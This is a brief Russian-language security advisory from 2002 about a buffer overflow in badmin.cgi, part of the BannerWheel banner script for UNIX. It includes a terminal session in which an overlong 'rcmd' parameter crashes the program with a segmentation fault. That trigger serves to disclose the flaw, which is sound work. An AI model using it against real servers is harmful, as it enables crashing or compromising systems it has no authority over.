Security Lab

Переполнение буфера в badmin.cgi

Дата публикации:21.05.2002
Всего просмотров:957
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: BannerWheel  – бесплатный сценарий для показа баннеров для UNIX систем.

Переполнение буфера происходит при снабжении чрезмерно длинных параметров к сценарию badmin.cgi.

Пример:

[capzlock@signal-11 ~/hack/the/planet]$ gcc badmin.c -o badmin.cgi -lcrypt [capzlock@signal-11 ~/hack/the/planet]$ ./badmin
bwe(input): "command" ? kill.the.turkey
bwe(input): "rcmd" ? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bwe(input): "flag" ? kill.the.turkey
Segmentation fault
[capzlock@signal-11 ~/hack/the/planet]$

Уязвимость обнаружена в BannerWheel v1.0
Ссылки: CAPZLOCK SECURITY ADVISORY NO. 1